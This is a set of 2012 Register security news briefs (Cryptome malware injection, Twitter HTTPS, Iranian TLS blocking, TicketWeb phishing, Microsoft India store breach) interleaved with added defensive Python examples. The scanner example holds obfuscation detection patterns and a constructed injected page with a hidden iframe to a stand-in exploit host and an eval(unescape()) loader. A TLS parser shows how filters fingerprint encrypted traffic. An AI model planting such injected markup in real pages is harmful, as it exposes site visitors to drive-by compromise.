STE WILLIAMS

Cryptome.org hacked to dish out malware

Cybercrooks have planted malicious scripts on top of whistle-blowing nerve centre Cryptome.org.

[Image caption: The website this morning…]

The attack, which used the well-known Blackhole toolkit, exposed surfers visiting any page of Cryptome.org to a hacker-controlled page that leveraged browser exploits and the like to compromise readers’ machines.

The methods used to breach Cryptome and plant the malicious code remained unclear as of Tuesday morning. There are several possible routes to compromising such a system, from SQL injection to exploiting a flaw in a public-facing server. It is also unclear who carried out the attack or why: the motive might simply be to infect machines and plant Trojans as part of a money-making scam, or it might be something more targeted against Cryptome’s user base.
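The article does not say what the injected code on Cryptome looked like, so the following is an added illustration rather than anything from the page: the post-compromise check a site operator would run over a static site’s HTML, looking for script, frame or object elements that pull content from an off-site host, invisible frames of the kind exploit kits use to load their landing page, and inline script that decodes and evaluates a blob of escaped data. The allowed hosts, the heuristics and the two sample pages are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption for the example: hosts allowed to serve this site's own script and frame content.
SITE_HOSTS = {"cryptome.org", "www.cryptome.org"}

# Constructs commonly seen in injected drive-by loaders; an illustrative heuristic, not a signature.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")


def looks_obfuscated(code: str) -> bool:
    """Flag inline script that calls a decode/eval primitive and carries a large
    amount of %xx or backslash-x escaped data (or is one very long blob)."""
    code = code.strip()
    if not code:
        return False
    escaped = len(re.findall(r"(?:%|\\x)[0-9a-fA-F]{2}", code))
    return any(m in code for m in OBFUSCATION_MARKERS) and (escaped > 20 or len(code) > 400)


class InjectedContentFinder(HTMLParser):
    """Walks one HTML document and records (kind, detail) findings."""

    def __init__(self, site_hosts):
        super().__init__()
        self.site_hosts = {h.lower() for h in site_hosts}
        self.findings = []
        self._in_script = False
        self._script_chunks = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            self._script_chunks = []
        if tag in ("script", "iframe", "object", "embed"):
            src = a.get("src") or a.get("data")
            host = urlparse(src).hostname if src else None
            if host and host.lower() not in self.site_hosts:
                self.findings.append(("offsite-" + tag, src))
        if tag == "iframe":
            # exploit kits usually hide their landing page in a tiny or invisible frame
            style = a.get("style", "").replace(" ", "").lower()
            if (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append(("hidden-iframe", a.get("src", "")))

    def handle_data(self, data):
        if self._in_script:
            self._script_chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            code = "".join(self._script_chunks)
            if looks_obfuscated(code):
                self.findings.append(("obfuscated-inline-script", code[:60]))


def scan_html(html: str, site_hosts=SITE_HOSTS):
    """Return the list of suspicious elements found in one page."""
    parser = InjectedContentFinder(site_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample pages: the first is clean, the second carries an injected hidden
# frame plus an eval(unescape(...)) loader of the kind drive-by kits use.
CLEAN_PAGE = (
    '<html><head><script src="/js/site.js"></script>'
    '<script src="http://cryptome.org/js/menu.js"></script></head>'
    '<body><p>Welcome.</p></body></html>'
)
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://exploit.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>'
    '<script>eval(unescape("' + "%68%74%74%70" * 12 + '"))</script></body>',
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page))
```

Run it over every file in the web root and diff the findings against a known-good copy of the site; a restore “with clean files”, as Cryptome describes, is only trustworthy if the clean copy predates the compromise and the scan of the restored tree comes back empty.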

Cryptome specialises in publishing information about cryptography, surveillance, freedom of speech and related issues. The site has a similar profile to WikiLeaks in some ways, but has been operating for far longer, since 1996.

The whistle-blowing site confirmed the hack and published a notice on its site on Tuesday saying that a “complete restoration of Cryptome with clean files is underway”. The restoration process is expected to take around a day. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/14/cryptome_hacked/

Twitter finally grabs wheel, drives all twits into HTTPS

Twitter has finally bedded down secure browsing on its site for all users after previously offering HTTPS as an optional feature.

In March last year it debuted the opt-in setting that enabled Secure Sockets Layer encryption, but explained at the time that the option would not be switched on by default.

The secure-browsing option was also not extended to users accessing Twitter from their mobile phones. The company’s temporary workaround was for users to type the address https://mobile.twitter.com themselves.

It’s fair to surmise from all that fiddling that only canny or overly cautious types actually switched SSL on for Twitter, or were wise enough to use the HTTPS address provided for mobile phones.

Others might wonder what took the company so long.

Twitter posted a brief statement on its blog explaining the switcheroo.

Last year, we added the option to always use HTTPS when accessing Twitter.com on the web. This setting makes your Twitter experience more secure by protecting your information, and it’s especially helpful if you use Twitter over an unsecured Internet connection like a public WiFi network.

Now, HTTPS will be on by default for all users, whenever you sign in to Twitter.com. If you prefer not to use it, you can turn it off on your Account Settings page. HTTPS is one of the best ways to keep your account safe and it will only get better as we continue to improve HTTPS support on our web and mobile clients.

Last week, social-networking-for-suits outfit LinkedIn confirmed it too was finally offering SSL to its users. It said that for now the option would not be switched on by default for all users of that site. ®
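The difference between “HTTPS on offer” and “HTTPS on by default” is testable from outside: request the plain-http URL and see whether the server pushes you to https on the same host, and whether any cookie it sets carries the Secure attribute (without it, the browser will send the session cookie over plain HTTP on the public Wi-Fi the blog post mentions, whatever the user typed). The following Python is an added example, not code from Twitter or from the article; the host `twitter.example` and the three responses are constructed stand-ins, not captures.

```python
import http.client
from urllib.parse import urlparse

REDIRECTS = (301, 302, 303, 307, 308)


def parse_raw_response(raw: str):
    """Split a raw HTTP/1.x response into (status_code, [(lower_name, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers


def fetch_status_headers(url: str, timeout: float = 10.0):
    """Live variant for a real host: one plain-HTTP GET, no redirect following."""
    u = urlparse(url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    conn.request("GET", u.path or "/", headers={"Host": u.hostname})
    resp = conn.getresponse()
    headers = [(n.lower(), v) for n, v in resp.getheaders()]
    conn.close()
    return resp.status, headers


def cookie_lacks_secure(set_cookie: str) -> bool:
    attrs = [p.strip().lower() for p in set_cookie.split(";")[1:]]
    return "secure" not in attrs


def assess_https_enforcement(requested_url: str, status: int, headers):
    """Judge a response to a plain-HTTP request: does the server push the browser to
    https on the same host, and does any cookie it sets lack the Secure attribute?"""
    req_host = urlparse(requested_url).hostname
    location = next((v for n, v in headers if n == "location"), None)
    upgraded = False
    if status in REDIRECTS and location:
        loc = urlparse(location)
        upgraded = loc.scheme == "https" and loc.hostname == req_host
    insecure = [v.split("=", 1)[0].strip()
                for n, v in headers if n == "set-cookie" and cookie_lacks_secure(v)]
    return {
        "status": status,
        "redirects_to_https": upgraded,
        "insecure_cookies": insecure,
        "verdict": "enforced" if upgraded and not insecure else "opt-in or absent",
    }


def assess_raw(requested_url: str, raw: str):
    return assess_https_enforcement(requested_url, *parse_raw_response(raw))


# Constructed responses to GET http://twitter.example/ for the three situations the
# article describes: opt-in only, the mobile site left on plain HTTP, and on-by-default.
OPT_IN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: session=abc123; Path=/; HttpOnly\r\n"
    "\r\n<html>timeline</html>"
)
MOBILE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: http://mobile.twitter.example/\r\n"
    "\r\n"
)
DEFAULT_ON_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: https://twitter.example/\r\n"
    "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("opt-in", OPT_IN_RESPONSE), ("mobile", MOBILE_RESPONSE),
                       ("default-on", DEFAULT_ON_RESPONSE)):
        print(label, assess_raw("http://twitter.example/", raw))
```

Against a live site use `assess_https_enforcement(url, *fetch_status_headers(url))`; a cross-host redirect (for instance to a plain-http mobile site) is deliberately not counted as an upgrade, because that is exactly the gap the article describes.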

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/14/twitter_ssl_now_set_to_default/

Iranians get some services back

Iranians have a little more Internet access than a few days ago, but access is still highly restricted.

Last week, the country imposed a block on SSL-based VPNs which, it seems, is still in place. Barring SSL/TLS traffic also stopped Iranians from using the well-known Tor network to bypass state censorship of Internet sites. In addition, Iranians found themselves unable to reach web-based mail services such as Gmail, Yahoo! Mail and Hotmail, along with a host of other popular services.
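A block on “SSL/TLS traffic” as such, rather than on particular sites, is cheap for a filter because a TLS connection announces itself in its first bytes. The following Python is an added illustration and not a description of the equipment Iran used: it assembles a minimal ClientHello record and then shows how little a filter has to parse to recognise one (the record type, version and handshake type) and how the SNI extension additionally hands over the destination host name in clear. The host name and cipher-suite values are placeholders chosen for the example.

```python
import struct

TLS_HANDSHAKE = 0x16      # record content type
CLIENT_HELLO = 0x01       # handshake message type
EXT_SERVER_NAME = 0x0000  # SNI extension id


def build_client_hello(server_name: str, version=(3, 1)) -> bytes:
    """Assemble a TLS record carrying a ClientHello with an SNI extension.
    Random, session id and cipher list are placeholders; enough for the parser below."""
    name = server_name.encode("idna")
    host_entry = struct.pack("!BH", 0, len(name)) + name          # name_type host_name(0)
    sni_list = struct.pack("!H", len(host_entry)) + host_entry
    extension = struct.pack("!HH", EXT_SERVER_NAME, len(sni_list)) + sni_list
    extensions = struct.pack("!H", len(extension)) + extension
    cipher_suites = struct.pack("!HHH", 4, 0x002F, 0x0035)        # two suites = 4 bytes
    body = (
        bytes(version) + bytes(32)                                # client_version, random
        + b"\x00"                                                 # empty session id
        + cipher_suites
        + b"\x01\x00"                                             # one compression method: null
        + extensions
    )
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE]) + bytes(version) + struct.pack("!H", len(handshake)) + handshake


def inspect_client_hello(data: bytes):
    """Return None if the bytes are not a TLS ClientHello record, else a dict with the
    record and client versions and the SNI host name (None if no SNI was sent).
    A filter that only wants to drop TLS needs nothing past the first six bytes."""
    try:
        if len(data) < 5 or data[0] != TLS_HANDSHAKE or data[1] != 3:
            return None
        rec_len = struct.unpack("!H", data[3:5])[0]
        hs = data[5:5 + rec_len]
        if len(hs) < 4 or hs[0] != CLIENT_HELLO:
            return None
        hs_len = int.from_bytes(hs[1:4], "big")
        body = hs[4:4 + hs_len]
        if len(body) < 35:
            return None
        off = 2 + 32                                  # client_version + random
        sid_len = body[off]; off += 1 + sid_len
        cs_len = struct.unpack("!H", body[off:off + 2])[0]; off += 2 + cs_len
        cm_len = body[off]; off += 1 + cm_len
        sni = None
        if off + 2 <= len(body):
            ext_len = struct.unpack("!H", body[off:off + 2])[0]; off += 2
            end = min(off + ext_len, len(body))
            while off + 4 <= end:
                etype, elen = struct.unpack("!HH", body[off:off + 4]); off += 4
                edata = body[off:off + elen]; off += elen
                if etype == EXT_SERVER_NAME and len(edata) >= 5:
                    name_len = struct.unpack("!H", edata[3:5])[0]
                    sni = edata[5:5 + name_len].decode("ascii", "replace")
        return {"record_version": (data[1], data[2]),
                "client_version": (body[0], body[1]),
                "sni": sni}
    except (struct.error, IndexError):
        return None


if __name__ == "__main__":
    record = build_client_hello("example.org")
    print(record[:6].hex(), inspect_client_hello(record))
    print(inspect_client_hello(b"GET / HTTP/1.1\r\nHost: example.org\r\n\r\n"))
```

Because the match is on protocol shape rather than on port or destination, moving a VPN or Tor to port 443 does nothing against such a block; only making the handshake look like something other than TLS does, which is why the article’s “SSL-based VPNs” were the casualty.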

The Washington Post is now reporting that the blocks on e-mail services seem to be easing, although access remains blocked to Facebook and Twitter.

Users running into the officially-denied blocks either wait an eternity for sites to load, or receive a block-page attributing their lack of access to “computer crime regulations”.

The blocks are attributed to upcoming elections and the anniversary of its 1979 revolution.

With the country tightening its grip on what users are able to access online, there is growing speculation that the country’s so-called “Halal Internet” is imminent. Last April, the country’s head of economic affairs Ali Aqamohammadi told state news agency IRNA that Iran plans this parallel Internet to counter “American dominance” over the Internet.

Iran has never explained in detail how such a project would operate. An alternate DNS root system creates a walled garden of sorts, but only if users don’t (or cannot) reach the rest of the world’s domains. A national-scale NAT firewall, on the other hand, is difficult to scale – as, arguably, Iran is discovering in its current efforts at censorship.

A member of Iran’s filtering committee, Mohammad Sadegh Afrasiabi, is reported by AFP as telling newspaper Hamshahri that the Iranian “national Internet” is four years away from implementation and won’t involve blocking e-mail. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/email_back_in_iran_for_now/

Anonymous reverse ferrets on CIA.gov takedown

Loosely connected hacking collective Anonymous claimed responsibility for making the CIA’s website inaccessible on Friday – but later said it was just reporting the event.

The apparent distributed denial of service attack against the spy agency’s web presence follows a week after the release of a recording of a conference call between the FBI and British law enforcement officials discussing the progress of various cases against alleged members of Anonymous and LulzSec.

A Twitter account associated with the activists’ movement claimed credit for the takedown before backtracking and saying it was merely “noting” that the cia.gov site was inaccessible.

The initial statement “#Anonymous takes down main CIA website cia.gov; site is still down | goo.gl/UL2ij” was followed by “We’d remind media that if we report a hack or ddos attack, it doesn’t necessarily mean we did it… FYI” from the same YouAnonNews Twitter account a day later.

The conflicting statements have created a certain amount of confusion about who was responsible for the outage.

A CIA representative confirmed problems with the agency’s website without commenting on the reasons for the downtime, saying: “We are aware of the problems accessing our Web site, and are working to resolve them.”

The cia.gov site returned to normal operation on Saturday. The site (which essentially serves as an online brochure for the spy agency and an outlet for public relations material) has been the target of hacktivists in the past, including a June 2011 attack by LulzSec.

Other elements of Anonymous launched attacks against the Mexican Senate and Interior Ministry websites, in a protest against proposed Mexican anti-piracy laws that hacktivists compared to the SOPA legislation north of the border.

And in a further attack against US law enforcement, other hacktivists posted (partially redacted) information swiped from police and government servers in Alabama.

Hackers claimed they had obtained highly sensitive personal information on 46,000 Alabama residents, including names, Social Security numbers, dates of birth, criminal records, and license plate numbers from insecure state government servers. A censored version of a sample of the hacked data was uploaded to PasteBin.

Anonymous said the hack was in protest against controversial Alabama state immigration laws. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/cia_website_outage/

TicketWeb coughs to email database hack

Customers of UK ticketing agency TicketWeb, a subsidiary of TicketMaster, received phishing emails from the company over the weekend after its direct email marketing system was hacked.

Users received an email that told them their current version of Adobe Acrobat Reader was out of date, and asked them to upgrade to the 2012 version. Within the email was a link to the upgrade that took them to a third-party website where they were asked for personal information, including their card details.

“On Saturday February 11, some of our customers received up to four unauthorised emails,” a TicketWeb spokesperson told The Register.

“These emails contained a link that customers may have followed and subsequently entered information into a third party website.

“Customers who may have entered card details upon following the link have been advised to contact their card issuer immediately for advice in respect of the best course of action to take in their particular circumstances.”

After the spam mails were sent out, TicketWeb emailed its customers with an urgent message warning them about the security breach and advising them that the emails were unauthorised.

The ticketing firm said that it had “taken immediate action to close the vulnerability”.

“No sensitive personal information or credit card information was vulnerable directly from the TicketWeb UK direct email marketing system during this incident,” the spokesperson said.

“We sincerely regret any concern that may have been caused. TicketWeb UK takes the security of customer data very seriously and will be liaising with the Information Commissioner’s Office in relation to this unauthorised system access.”

The firm said it couldn’t provide any more information at this stage about what sort of vulnerability had been exploited.

TicketWeb sells tickets to all sorts of events in the UK, including gigs, theatre performances, comedy clubs, festivals and nightclubs. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/ticketweb_email_lists_hacked/

Google locks Wallets – no new customers for now

Google has suspended the provisioning of pre-paid cards into its electronic wallet, preventing the use of stolen cards but equally preventing new customers from signing up.

Two recent attacks have been made on Google’s Wallet, which protects cards used to authorise NFC transactions made by bonking a phone into a payment point. The suspension of provisioning deals with the problem of the latter, more trivial, attack, while Google makes a technical fix – but fixing customer confidence will be much more of a challenge.

The first attack, which remains possible, can only be launched on a phone which has been rooted, and requires the installation (and development) of some specialist software. That attack discovers the user’s existing PIN, and once this is known the attacker can make payments and view the user’s transaction history – though the attacker cannot see the details of the cards on the phone (which are not displayed on-screen, as we erroneously reported last week).

The latter attack requires physical access to the phone, but it is trivial and can be accomplished within a few seconds if the handset isn’t protected with screen lock. Just deleting the Wallet application data makes it ask for a replacement PIN as though running it for the first time, but it also makes a provisioning request to Google before it opens – so by halting provisioning Google has blocked that process.

Both attacks allow the miscreant to make payments using the credit stored on the phone, at least until the account is cancelled, making an electronic wallet almost as insecure as a physical one. The electronic version still won’t reveal the card details, and can be remotely cancelled as well as tracked (if appropriate software is installed), so it is still much more secure than the traditional leather package, but that’s not how the public sees it.

New technology is always scary, and people have been carrying wallets for a long time. A lost wallet is a known quantity, and the familiarity makes it less scary. Most stolen wallets are taken for the cash they contain, and then discarded; electronic wallets may well prove similar.

NFC World reckons that Google rushed its Wallet out with the intention of fixing it later, and lists several outstanding questions about how transfers of balances and repeated installations will be handled. None of the attacks has targeted the NFC payment process itself; instead they reveal flaws in the way users manage the Wallet, which lies outside the NFC standard.

The problem for the industry is the undermining of public confidence in the whole idea of proximity payments. Once undermined, that confidence is very hard to rebuild – and one has to wonder if Google is the ideal company to handle that rebuilding. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/google_wallet_lock/

Microsoft India web store ‘hacked by Chinese group’

Microsoft appears to have had its Indian web store broken into and user login credentials stolen by Chinese hackers.

Tech site WP Sauce reported on Sunday that the group, which goes by the name Evil Shadow Team, managed to deface the web site, posting an image of a V for Vendetta mask and the message: “Unsafe system will be baptized.”

At the time of writing the site had been taken offline, presumably while Quasar Media, the third-party digital media firm Microsoft employed to run it, figures out what went wrong.

“The Microsoft Store India is currently unavailable. Microsoft is working to restore access as quickly as possible. We apologise for any inconvenience this may have caused,” the holding page message reads.

According to multiple reports, punters’ logins and passwords were also stolen by the hackers, a situation made significantly worse because Quasar apparently made the schoolboy error of storing them in plain text.
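What “storing them in plain text” costs, and what the alternative looks like, as an added Python example that is not code from the page, from Microsoft or from Quasar Media: the first pair of functions models a store where the record is the password itself, so a dumped table is a credential list; the second pair derives a per-user salted, iterated digest with `hashlib.pbkdf2_hmac` and verifies with a constant-time compare, so the same dump yields only salts and digests that must be brute-forced one user at a time. The iteration count is an assumption chosen for the example, and the in-memory dict stands in for the database table.

```python
import base64
import hashlib
import hmac
import os

# --- what the article says the store did: the record *is* the password ------------
def store_plaintext(username: str, password: str, db: dict) -> None:
    db[username] = password


def verify_plaintext(username: str, password: str, db: dict) -> bool:
    return db.get(username) == password


# --- salted, iterated hash: a dumped table yields only salts and digests -----------
ITERATIONS = 100_000   # assumption: cost chosen for the example; tune it to the server


def _derive(password: str, salt: bytes, iterations: int) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)


def store_hashed(username: str, password: str, db: dict) -> None:
    salt = os.urandom(16)   # per-user salt: identical passwords give different records
    digest = _derive(password, salt, ITERATIONS)
    db[username] = "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_hashed(username: str, password: str, db: dict) -> bool:
    record = db.get(username)
    if record is None:
        _derive(password, b"\x00" * 16, ITERATIONS)   # same cost for unknown users
        return False
    _, iterations, salt_b64, digest_b64 = record.split("$")
    expected = base64.b64decode(digest_b64)
    actual = _derive(password, base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(actual, expected)   # no early exit on the first wrong byte


if __name__ == "__main__":
    plain, hashed = {}, {}
    store_plaintext("alice", "correct horse", plain)
    store_hashed("alice", "correct horse", hashed)
    print("plaintext table leaks:", plain["alice"])
    print("hashed table leaks:   ", hashed["alice"])
    print("login ok:", verify_hashed("alice", "correct horse", hashed),
          "wrong pw:", verify_hashed("alice", "wrong", hashed))
```

The record embeds its own iteration count, so the cost can be raised later and old records re-hashed at the user’s next successful login; the advice in the article to change reused passwords elsewhere stands regardless, since a plaintext dump has already exposed them.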

Not much is known about Evil Shadow Team, although a link posted on the defaced Microsoft Store page on Sunday takes the user to the group’s blog, written in Chinese and titled “7z1’s blog”.

Users of Microsoft Store in India have been advised to change their passwords on the site as soon as it comes back online, and to change their credentials on any other sites if they used the same ones across multiple online accounts.

Microsoft has yet to respond to a request for comment. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/microsoft_india_web_store_hack/

Virtual Nazi-code-cracking Colossus in fundraising appeal

The National Museum of Computing (TNMOC) has turned to a tried-and-tested fundraising method to establish a home for the rebuilt Colossus computer at Bletchley Park.

Individuals and firms are invited to buy up pixels of an online picture of the wartime code-breaking machine – at 10 pence per dot with a minimum spend of £10 – pretty much like Alex Tew’s million-dollar homepage effort.

The museum’s curators need the cash to open an exhibition featuring the Colossus in the historic Block H, on the spot where Colossus No 9 stood during the Second World War and where the rebuild took place.

Colossus was the world’s first electronic programmable computer, and was used to crack encrypted messages between Hitler and his generals.

Housing the rebuild in the same location as its wartime predecessor will be “a fitting tribute to the wartime code-breakers and an inspiration to future generations of computer scientists and engineers”, according to the museum.

Details of how to sponsor a valve on the virtual Colossus can be found here. Payment is collected by PayPal. The National Museum of Computing hopes to raise £150,000 via the scheme.

More information on the Colossus rebuild project, which was led by engineer Tony Sale, can be found here. Details of the technology were kept secret until 1975. The rebuild project started in the 1990s and took more than ten years.

Tim Reynolds, acting chairman of TNMOC, said: “Tony Sale’s tribute to the wartime code-breakers is awe-inspiring and we are seeking resources to present the rebuilt Colossus so that generations to come will be able to understand its significance. The death of Tony Sale last year was a tragic loss to us all, but fortunately he had already started to plan the new gallery with a TNMOC team.

“TNMOC, an independent charity, has received no lottery funding and must pay substantial rent and other overheads. Despite this and working with very modest budgets, we have opened two major new galleries – featuring the Tunny machine and BBC Domesday Touchtable – over the past nine months and have two more including Colossus planned for 2012. We therefore welcome all contributions from individuals and company sponsors to help us present a gallery that will do justice to Colossus and enthral visitors for years to come.”

The Colossus room will be closed from early March for the construction of a new gallery, which will house “exciting interactive and informative displays” as well as, hopefully, the rebuilt Colossus. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/10/bletchley_park_colossus/

Penang fraud gang ‘ringleader’ snared by Taiwan police

The suspected ringleader of an internet and telephone fraud gang based in Penang, Malaysia, has been nabbed by police after being lured to Taiwan by his former gang-mates, it has emerged.

A Taiwanese man known as Huang was reportedly arrested at Taoyuan International Airport near Taipei as he re-entered the country at the end of January, two weeks after over 30 of his alleged gang mates were nicked during Penang raids earlier that month.

Taiwanese police are said to have used 10 members of the gang arrested in the earlier raids to persuade Huang to come back to the country.

The gang, which reportedly comprised Taiwanese, Malaysian and Chinese nationals and was nicknamed the “Macau Cheats”, may have coined in as much as NT$400m (£8.6m) in nearly two years.

Members of the gang were recruited through newspaper and internet ads offering to pay large sums for telephone sales staff based in Malaysia.

However, the actual role entailed them cold-calling mainly Chinese nationals, pretending to be bank workers, police officers and other officials and persuading the victim to transfer funds to accounts owned by the fraudsters.

Separately, local news has reported that Penang police have seized over 1,000 computerised gambling machines already this year in an attempt to crack a large-scale syndicate operating illegal gambling premises disguised as cyber cafes.

According to the New Straits Times, such operations remain widespread despite a concerted police crackdown because of the large sums on offer. Gambling ringleaders can expect to make upwards of £370,000 a year, the reports suggested. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/10/penang_fraud_arrested_taiwan/

EU competition chief threatens patent war smackdown

European anti-competition chief Joaquin Almunia has warned that the EU won’t stand for any messing about with technology standards-related patents.

Almunia, giving a speech today at the Concurrences conference in Paris, said that he was prepared to use the EU’s enforcement measures, such as fines of up to 10 per cent of a biz’s global turnover, to make his point.

“Standardisation processes must be fair and transparent, so that they are not in the hands of established firms willing to impose their technologies. But it is not enough. We must also ensure that, once they hold standard essential patents, companies give effective access on fair, reasonable and non-discriminatory terms,” Almunia said.

“I am determined to use antitrust enforcement to prevent the misuse of patent rights to the detriment of a vigorous and accessible market. I have initiated investigations on this issue in several sectors and we will see the results in due time.”

The EU has already announced a formal investigation of Samsung for misuse of essential patents in its European battles with Apple over smartphones and fondleslabs.

In the last few months, Google, Apple and Microsoft have all given promises to behave when it comes to standards patents, though they all seem to have left themselves a little wiggle-room.

Essential patents relate to industry standards, such as 3G for mobiles. They’re supposed to be open to everyone to license relatively easily and cheaply so that new businesses can have a chance to enter the market.

“It is a major task of competition control to ensure that new generations of businesses are given a fair chance,” Almunia said in his speech. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/10/eu_chief_warns_on_patents/